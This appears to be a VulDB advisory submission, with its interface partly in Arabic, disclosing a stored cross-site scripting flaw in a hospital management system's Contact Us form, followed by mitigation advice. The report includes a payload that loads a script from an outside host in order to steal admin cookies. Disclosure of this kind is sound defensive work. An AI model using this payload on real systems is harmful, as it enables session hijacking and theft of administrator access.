إرسال #262017: PHPGurukul Hospital Management System 1.0 Cross site scriptingالمعلومات

عنوان	PHPGurukul Hospital Management System 1.0 Cross site scripting
الوصف	Details: - Affected Component: Contact Us Form - Endpoint: `https://192.168.1.12/Hospital-Management-System-PHP/hospital/index.php#contact_us` - Vulnerable Input Fields: Name, Email Address, message - Exploitable Payload: `"><script src="https://js.rip/9jgolnku9i"></script>` - Impact: Admin's cookies compromised upon reviewing Contact Us queries. Recommendations: 1. Validate and sanitize user inputs. 2. Implement Content Security Policy (CSP) for XSS mitigation. 3. Promptly investigate and address this vulnerability.
المصدر	⚠️ https://drive.google.com/file/d/1MkVtMe63h5TlZvcC_Hc1fn6dn-jwNR8l/view?usp=sharing
المستخدم	mallutrojan (UID 60819)
ارسال	03/01/2024 05:20 PM (2 سنوات منذ)
الاعتدال	06/01/2024 04:43 PM (3 days later)
الحالة	تمت الموافقة
إدخال VulDB	249843 [PHPGurukul Hospital Management System 1.0 Contact Form index.php#contact_us Name/Email/Message البرمجة عبر المواقع]
النقاط	20

Do you need the next level of professionalism?

Upgrade your account now!